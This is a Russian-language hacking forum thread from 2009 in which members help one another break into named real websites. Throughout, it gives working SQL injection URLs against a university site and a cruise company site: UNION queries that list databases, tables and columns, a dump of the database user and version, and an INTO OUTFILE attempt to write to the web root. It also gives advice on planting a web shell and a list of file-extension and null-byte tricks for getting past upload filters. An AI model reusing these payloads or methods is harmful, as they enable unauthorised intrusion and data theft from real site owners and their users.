Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    PaCo, а можно поподробнее...)
     
  2. PaCo

    PaCo Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    436
    Likes Received:
    138
    Reputations:
    25
    В каком смысле поподробней? Я же дал рабочий пример, а дальше сам, пробел тока убери перед:
    %3C/script%3E
     
  3. slammer

    slammer New Member

    Joined:
    2 May 2009
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    http://www.mcli.dist.maricopa.edu/cares/resources.php?cat=-2'+union+select+1,2,convert(column_name+using+latin1),4,5,6,7,8+from+information_schema.columns+where+table_name=%27users%27/*

    не получается конкретизировать запрос под определенную бд. получается высвечивает колонки всех бд с такой таблицей

    статьи читаю, такого не нахожу
     
  4. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://www.mcli.dist.maricopa.edu/cares/resources.php?cat=-2'+union+select+1,2,unhex(hex(column_name)),4,5,6,7,8+from+information_schema.columns+where+table_name=0x7573657273/*
    
    тьфу, вопрос неправильно прочитал, сорри:


    Текущая БД:

    Code:
    http://www.mcli.dist.maricopa.edu/cares/resources.php?cat=-2'+union+select+1,2,unhex(hex(database())),4,5,6,7,8/*
    
    БД, в которых есть табла users:

    Code:
    http://www.mcli.dist.maricopa.edu/cares/resources.php?cat=-2'+union+select+1,2,unhex(hex(table_schema)),4,5,6,7,8+from+information_schema.columns+where+table_name=0x7573657273/*
    
    все таблицы из конркетно текущей БД:

    Code:
    http://www.mcli.dist.maricopa.edu/cares/resources.php?cat=-2'+union+select+1,2,unhex(hex(CONCAT_WS(0x3a,table_schema,table_name))),4,5,6,7,8+from+information_schema.tables+WHERE+table_schema=DATABASE()/*
    
     
    #7244 Pashkela, 24 May 2009
    Last edited: 24 May 2009
  5. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Code:
    http://www.mcli.dist.maricopa.edu/cares/resources.php?cat=-2'+union+select+1,2,unhex(hex(concat(column_name,0x3a,table_schema))),4,5,6,7,8+from+information_schema.columns+where+table_name='users'/*
     
    #7245 R1dex, 24 May 2009
    Last edited: 24 May 2009
  6. PaCo

    PaCo Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    436
    Likes Received:
    138
    Reputations:
    25
    Там file_priv c неэкранированием кавычек, ищи путь до веб диры и лей через into dumpfile, тем более есть например drupal а там в базе в табличке конфигов лежит полный путь.
     
  7. slammer

    slammer New Member

    Joined:
    2 May 2009
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    спасибо, высвечивает хотябы привязанные к бд колоноки, разобраться можно)

    буду пробовать
     
  8. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    ...
    Узнаем путь в файле phpinfo.php =)
    http://www.mcli.dist.maricopa.edu/cares/resources.php?cat=-1'+union+select+1,2,3,'qw',5,6,7,8+from+mysql.user+into+outfile+'/d0/www/sites/www.mcli.dist.maricopa.edu/htdocs/images/d012.jpg'+--+
    Oops Access denied for user 'mcliweb'@'%' (using password: YES)

    Т.ч. =(
    ...
     
    2 people like this.
  9. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    http://www.francecruises.com/river62+order+by+12---.html
    http://www.francecruises.com/river62+union+select+1,2,3,4,5,6,7,8,9,10,11,12---.html
    Хелп... PS: не надо про блинд... Мне нужно вывод сделать.
     
  10. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    select * from tblcru_barge left join tblcru_bargetype

    скорее всего фиг
     
  11. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    group+by+31:
    PHP:
    http://www.francecruises.com/hotel-12+union+select+1,2,3,4,5,concat_ws(0x3a,user(),version(),database()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31---HotelSaintPaulParis.html
    [email protected]:5.0.51-log:francecruises_com_2
     
    1 person likes this.
  12. Krist_ALL

    Krist_ALL Banned

    Joined:
    14 Jan 2009
    Messages:
    436
    Likes Received:
    193
    Reputations:
    24
    В админке инет шопа мона загружать изображения, гружу файл f.php а скрипт переименовывет его в 45s.jpg как этого избежать?
     
  13. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    залей картинку и посмотри, передающиеся пакеты... потом зайлей *.php файл и сравни...

    //Если есть пасс, то попробуй приконектиться к phpmyadmin и ам залить шелл, попробуй к ftp/ssh
     
  14. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    Krist_ALL, ищи локальный инклуд.
     
  15. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Krist_ALL, если хостинг плохой, то можно проверить еще через ReverseIP и пройтись по сторонним сайтам и там уже проинклюдить картинку ;)
     
  16. Krist_ALL

    Krist_ALL Banned

    Joined:
    14 Jan 2009
    Messages:
    436
    Likes Received:
    193
    Reputations:
    24
    фильтр обойти не удалось...
    инклуда нет...
    ток пхпинфо нашел...
    ну лана)
     
    #7256 Krist_ALL, 24 May 2009
    Last edited: 24 May 2009
  17. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    и что? к чему твой пост? ты мог бы там дать линк в ПМ, мог бы погуглить слова, что не понятны из моего или поста Снейка...
     
    3 people like this.
  18. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    пробовать обойти фильтр, в идеале - изучить исходник. Подсказки:

    .php
    .PHP
    image.PHP
    image.jpg.php
    image.php3
    image.php5
    image.PHP3
    image.PHP5
    image.phtml
    image.PHTML

    Если нет - слушай нюка

    ЗЫЖ Хотя 100% еще есть варианты, в общем долго думать, упорствовать и не сдаваться

    ЗЗЫЫЖЖ где взять исходник? Изучать сорцы на главной, изучать сорцы админки и etc. Надеятся на тщеславие и жадность лошар всяких

    если есть phpinfo() - то обратить внимание, включены ли маджик квотс, если нет - то пробовать %00

    если есть регистр глобалс он - пробавть переопределить сессию, особенно если она есть в адресной строке, но тут без LFI отдыхаем

    правда есть скуля и некоторые другие условия - то можено и пожжечь

    В обещем вариантов миллион и миллиард. Надо искать, главное пытаться
     
    #7258 Pashkela, 25 May 2009
    Last edited: 25 May 2009
    1 person likes this.
  19. serega393

    serega393 Banned

    Joined:
    15 May 2009
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Люди,help. кароч нашол скуль версия 5,всё гуд. Как получить рута на машине. Я имею ввиду как залить шел через sql и как потом его запустить. блин я ламо. помогите плиз.
    может ссылки на статьи ачата есть какиенить
     
  20. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    Вот хорошая ссылка - https://forum.antichat.ru/search.php
     
    1 person likes this.
Thread Status:
Not open for further replies.